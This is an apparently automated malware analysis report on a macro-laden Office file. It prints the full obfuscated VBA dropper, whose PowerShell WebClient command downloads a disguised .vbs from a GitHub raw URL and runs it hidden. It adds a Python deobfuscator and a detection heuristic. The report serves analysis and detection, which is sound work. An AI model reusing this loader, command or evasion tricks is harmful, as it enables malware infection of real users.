Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5b94d79838bfe785…

MALICIOUS

Office (OOXML)

Size: 13.6 KB   First seen: 2021-02-23
MD5: 3bc9f1801caffbca619b42b7fb89faa0   SHA-1: 3612bccb39ad23fdc99e9c740c07fec9803d8788   SHA-256: 5b94d79838bfe785c92838682e0d7edfd541e74083b2b133b6b7f0c77649caae
Risk score: 230

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Sub auto_open()
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set pMxjFuP = GetObject(baFhJMAOy())
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set pMxjFuP = GetObject(baFhJMAOy())
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg  In document text (OOXML body / shared strings); the same URL is also assembled inside the macro source in the extracted macros.bas below (DownLoAdfIlE argument).

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3019 bytes
SHA-256: f8304c1e9a5e4a5614271a01446ce29cd146320197c958629af9be89be34a58f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"


Sub auto_open()

On Error Resume Next





boloteia = gbyDNiUmZV()

End Sub








Function DBKuOoh()
DBKuOoh = "hs" + "re"
End Function


Function gbyDNiUmZV()
'VBvPcFXclnCC = Array(kgUHXlR(QgjxziNx()), kgUHXlR(rnsQt()))






fd780 = Array("l", "le", DBKuOoh(), "wo", "P")

hgf8 = Join(fd780, "")









  

  Dim lll As String
  lll = "c"
  



unbmyajjzms = "(NEw-objE" & lll & "t " & "system.net.wEBclIenT).DownLoAdfIlE" & "( ”https://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg” , ”$ENv:public\pandorinha.vbs” ) ; stARt-PRoCESs ”$ENv:public\pandorinha.vbs”"


'geTpUk (unbmyajjzms)
'qcydwyqnozj (kgUHXlR(hgf8) & Space(1) & a)



geTpUk (kgUHXlR(hgf8) & Space(1) & unbmyajjzms)

End Function

'=====================================================================
'Begin Code
Function kgUHXlR(w7df0sd)
 Dim p
  For p = Len(w7df0sd) To 1 Step -1
      kgUHXlR = kgUHXlR & Mid(w7df0sd, p, 1)
  Next
End Function
Sub geTpUk(twe70)
If 473708283 = 473708283 + 1 Then End

Dim bARdSPJbYuep As String
Set pMxjFuP = GetObject(baFhJMAOy())
pMxjFuP.Run twe70, 0

End Sub
Function AttzfJHm()
If 510001701 = 510001701 + 1 Then End

Dim XvZFokZtj As Double
AttzfJHm = GNufAJd(decrypt(Hex2Str("4533443B"), Hex2Str("33")) + decrypt(Hex2Str("3D4C4E3C384B383835414A4C4935"), Hex2Str("38")) + decrypt(Hex2Str("3347343430334946"), Hex2Str("33")) + decrypt(Hex2Str("38343D394A4B3C"), Hex2Str("37")) + decrypt(Hex2Str("393F4C407D6B74"), Hex2Str("36")))

End Function
Function baFhJMAOy()
If 118835736 = 118835736 + 1 Then End

Dim iDWQGl As String
baFhJMAOy = GNufAJd(decrypt(Hex2Str("4B394A413E4D4F3D39"), Hex2Str("39")) + decrypt(Hex2Str("4532322F3B4446432F32"), Hex2Str("32")) + decrypt(Hex2Str("4A373733364C493733"), Hex2Str("36")) + decrypt(Hex2Str("3333444536343A473B78666F"), Hex2Str("31")))

End Function
Function GNufAJd(w7df0sd)
 Dim p
  For p = Len(w7df0sd) To 1 Step -1
If 172023426 = 172023426 + 1 Then End

Dim QSTYgWCLLK As Currency
      GNufAJd = GNufAJd & Mid(w7df0sd, p, 1)

  Next
End Function
Public Function decrypt(strInput As String, second As Integer)
    Dim first As Integer
    For first = 1 To Len(strInput)
If 218466674 = 218466674 + 1 Then End

Dim QgIHX As Currency
        Mid(strInput, first, 1) = Chr(Asc(Mid(strInput, first, 1)) - second)

    Next first
If 340325665 = 340325665 + 1 Then End

Dim TKYiRREE As Integer
    decrypt = strInput

End Function
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For second = 1 To Len(strData) Step 2
If 124270001 = 124270001 + 1 Then End

Dim XlHJScWA As Date
        CryptString = CryptString & Chr$(Val("&H" & Mid$(strData, second, 2)))

    Next second
If 567355800 = 567355800 + 1 Then End

Dim vbonEIKCbqi As Date
    Hex2Str = CryptString

End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 32768 bytes
SHA-256: 26306d7544a1f7d12e98bdbdd99c1c17a9e373081f0f27ca15c2aded6a73814c
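Static deobfuscation of the extracted macro, added to this report as a worked example; it is not part of the scanner output or of the sample. It re-implements the three helper routines the macro relies on (Hex2Str, the per-chunk Caesar-shift decrypt, and the string-reversal functions kgUHXlR/GNufAJd) in Python, feeds them the hex constants copied from macros.bas above, and recovers what the macro really hands to GetObject() and to .Run, which is the string that the obfuscated-loader and GetObject heuristics flag. It also shows the de-escaping step the downloader heuristic describes (backtick/caret removal plus curly-quote folding) applied to the reconstructed command line. The Python function names, the token lists and the dead-code test string are mine; the hex constants, the reversed "Powershell" array and the command tail are the sample's own.

```python
"""Deobfuscate the sample's VBA loader statically (added example, not the sample's code)."""

def hex2str(hex_data: str) -> str:
    # Hex2Str: every pair of hex digits becomes one character (Chr$(Val("&H" & ..))).
    return "".join(chr(int(hex_data[i:i + 2], 16)) for i in range(0, len(hex_data), 2))

def decrypt(s: str, shift: int) -> str:
    # decrypt: Chr(Asc(c) - second) for every character, i.e. a per-chunk Caesar shift.
    return "".join(chr(ord(c) - shift) for c in s)

def reverse(s: str) -> str:
    # kgUHXlR / GNufAJd: walk the string from its last character to its first.
    return s[::-1]

def decode_chunks(chunks) -> str:
    # Each chunk is (hex payload, hex shift) exactly as written in the macro:
    # decrypt(Hex2Str("4B39.."), Hex2Str("39")).  Hex2Str("39") is the text "9",
    # which VBA coerces to the Integer 9 for the `second As Integer` parameter.
    plain = "".join(decrypt(hex2str(payload), int(hex2str(shift))) for payload, shift in chunks)
    return reverse(plain)

# Constants copied from baFhJMAOy() (used) and AttzfJHm() (never called) in macros.bas.
GETOBJECT_CHUNKS = [("4B394A413E4D4F3D39", "39"), ("4532322F3B4446432F32", "32"),
                    ("4A373733364C493733", "36"), ("3333444536343A473B78666F", "31")]
DEAD_CODE_CHUNKS = [("4533443B", "33"), ("3D4C4E3C384B383835414A4C4935", "38"),
                    ("3347343430334946", "33"), ("38343D394A4B3C", "37"), ("393F4C407D6B74", "36")]

def getobject_argument() -> str:
    # The "new:" moniker instantiates a COM class by CLSID, so the ProgID
    # "WScript.Shell" never appears in the macro source.
    return decode_chunks(GETOBJECT_CHUNKS)

def dead_code_argument() -> str:
    return decode_chunks(DEAD_CODE_CHUNKS)

def interpreter_name() -> str:
    # gbyDNiUmZV(): Join(Array("l", "le", "hs" + "re", "wo", "P"), "") then kgUHXlR().
    return reverse("".join(["l", "le", "hs" + "re", "wo", "P"]))

# Command tail from unbmyajjzms, with the sample's curly quotes (U+201D) kept verbatim.
COMMAND_TAIL = ("(NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( "
                "\u201dhttps://raw.githubusercontent.com/farao151e/s/main/fevereiro.jpg\u201d , "
                "\u201d$ENv:public\\pandorinha.vbs\u201d ) ; stARt-PRoCESs \u201d$ENv:public\\pandorinha.vbs\u201d")

def run_command() -> str:
    # geTpUk(kgUHXlR(hgf8) & Space(1) & unbmyajjzms) -> pMxjFuP.Run twe70, 0
    return interpreter_name() + " " + COMMAND_TAIL

# --- normalisation step the downloader heuristic describes (my token lists) ---
DOWNLOAD_PRIMITIVES = ("start-bitstransfer", "invoke-webrequest", "net.webclient",
                       "downloadfile", "bitsadmin", "certutil")
EXEC_TOKENS = ("start-process", "invoke-expression", "iex", "wscript", "cscript", "cmd")

def normalise(cmd: str) -> str:
    # Strip PowerShell backtick and cmd caret escapes, fold the curly double quotes
    # (U+201C/U+201D, which PowerShell's tokenizer accepts as string delimiters) to '"',
    # and case-fold, so split or mixed-case keywords match again.
    for src, dst in (("`", ""), ("^", ""), ("\u201c", '"'), ("\u201d", '"')):
        cmd = cmd.replace(src, dst)
    return cmd.lower()

def is_download_and_run(cmd: str) -> bool:
    n = normalise(cmd)
    return any(p in n for p in DOWNLOAD_PRIMITIVES) and any(e in n for e in EXEC_TOKENS)

if __name__ == "__main__":
    print("GetObject argument :", getobject_argument())
    print("unused AttzfJHm()  :", dead_code_argument())
    print("WScript.Shell.Run  :", run_command())
    print("download-and-run   :", is_download_and_run(run_command()))
```

Running this recovers `new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B` as the GetObject() argument, the CLSID of WScript.Shell, which is why the report shows a GetObject hit and a CreateObject-free loader rather than a plain `CreateObject("WScript.Shell")` signature. The `.Run twe70, 0` call then launches `Powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE(...) ; stARt-PRoCESs ...` with a hidden window; the curly quotes the macro embeds are accepted by PowerShell's tokenizer as ordinary double quotes, so the command runs as written while defeating naive `"`-based string matching. AttzfJHm() decodes by the same chain to a neighbouring `new:F935DC26-...` CLSID from the same Windows Script Host component but is never called, and the `If 473708283 = 473708283 + 1 Then End` lines are opaque predicates that never fire; both are junk intended to pad and confuse, not functionality.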